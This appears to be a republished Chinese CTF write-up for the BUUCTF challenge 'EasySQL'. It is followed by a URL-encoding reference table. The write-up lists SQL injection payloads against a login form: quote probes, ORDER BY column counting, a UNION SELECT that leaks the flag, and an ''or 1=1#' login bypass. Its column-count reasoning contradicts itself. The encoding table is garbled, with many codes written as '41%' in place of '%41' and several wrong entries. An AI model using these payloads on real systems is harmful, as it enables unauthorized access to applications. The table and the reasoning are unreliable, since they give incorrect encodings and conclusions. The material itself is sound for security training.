BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)
点击链接进入环境发现是一个登录界面
我的思路:
第一步、测试注入点(tips:利用单引号,and 1=1, or 1=1之类的,%23为#注释符的url编码)判断是字符型还是数字型
payload:username=1' &password=123(SQL tyntax)
payload:username=1' %23&password=123(说明存在注入点)
第二步、利用order by查表的列数
payload:username=1' order by 1%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 2%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 3%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 4%23&password=123(Unknown column '4' in 'order clause')
说明表只有四列
第三步、如有回显,找到回显位(回显,就是显示正在执行的批处理命令及执行的结果等)
payload:username=1' union select 1,2,3%23&password=123
flag{cb71f2ab-7fea-42d9-bf34-41755337fada}
发现在查找回显位的这一步就出现了flag,都用不到爆库
第四步、利用union select 爆库、爆表、爆字段名、爆值
看大佬wp发现还有一种更简单的方法:
实际上这道题是登录成功就可以拿到flag
在用户名和密码都填:
payload:'or 1=1#
由于用户名和密码都存在sql注入漏洞,可以用'闭合前面的查询语句同时用or绕过判断
★URL编码表:
| backspace | 8% | A | 41% | a | 61% | § | %A7 | Õ | %D5 | |
| tab | 9% | B | 42% | b | 62% | « | %AB | Ö | %D6 | |
| linefeed | %0A | C | 43% | c | 63% | ¬ | %AC | Ø | %D8 | |
| creturn | %0D | D | 44% | d | 64% | ¯ | %AD | Ù | %D9 | |
| space | 20% | E | 45% | e | 65% | º | %B0 | Ú | %DA | |
| ! | 21% | F | 46% | f | 66% | ± | %B1 | Û | %DB | |
| " | 22% | G | 47% | g | 67% | ª | %B2 | Ü | %DC | |
| # | 23% | H | 48% | h | 68% | , | %B4 | Ý | %DD | |
| $ | 24% | I | 49% | i | 69% | µ | %B5 | Þ | %DE | |
| % | 25% | J | %4A | j | %6A | » | %BB | ß | %DF | |
| & | 26% | K | %4B | k | %6B | ¼ | %BC | à | %E0 | |
| ' | 27% | L | %4C | l | %6C | ½ | %BD | á | %E1 | |
| ( | 28% | M | %4D | m | %6D | ¿ | %BF | â | %E2 | |
| ) | 29% | N | %4E | n | %6E | À | %C0 | ã | %E3 | |
| * | %2A | O | %4F | o | %6F | Á | %C1 | ä | %E4 | |
| + | %2B | P | 50% | p | 70% | Â | %C2 | å | %E5 | |
| , | %2C | Q | 51% | q | 71% | Ã | %C3 | æ | %E6 | |
| - | %2D | R | 52% | r | 72% | Ä | %C4 | ç | %E7 | |
| . | %2E | S | 53% | s | 73% | Å | %C5 | è | %E8 | |
| / | %2F | T | 54% | t | 74% | Æ | %C6 | é | %E9 | |
| 0 | 30% | U | 55% | u | 75% | Ç | %C7 | ê | %EA | |
| 1 | 31% | V | 56% | v | 76% | È | %C8 | ë | %EB | |
| 2 | 32% | W | 57% | w | 77% | É | %C9 | ì | %EC | |
| 3 | 33% | X | 58% | x | 78% | Ê | %CA | í | %ED | |
| 4 | 34% | Y | 59% | y | 79% | Ë | %CB | î | %EE | |
| 5 | 35% | Z | %5A | z | %7A | Ì | %CC | ï | %EF | |
| 6 | 36% | ð | %F0 | |||||||
| 7 | 37% | ? | %3F | { | %7B | Í | %CD | ñ | %F1 | |
| 8 | 38% | @ | 40% | | | %7C | Î | %CE | ò | %F2 | |
| 9 | 39% | [ | %5B | } | %7D | Ï | %CF | ó | %F3 | |
| : | %3A | \ | %5C | ~ | %7E | Ð | %D0 | ô | %F4 | |
| ; | %3B | ] | %5D | ¢ | %A2 | Ñ | %D1 | õ | %F5 | |
| < | %3C | ^ | %5E | £ | %A3 | Ò | %D2 | ö | %F6 | |
| = | %3D | _ | %5F | ¥ | %A5 | Ó | %D3 | ÷ | %F7 | |
| > | %3E | ` | 60% | | | %A6 | Ô | %D4 | ø | %F8 | |
| ù | %F9 |
总结
以上是生活随笔为你收集整理的BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)的全部内容,希望文章能够帮你解决所遇到的问题。
- 上一篇: 面向大数据处理的数据流编程模型和工具综述
- 下一篇: BUUCTF-WEB:[SUCTF 20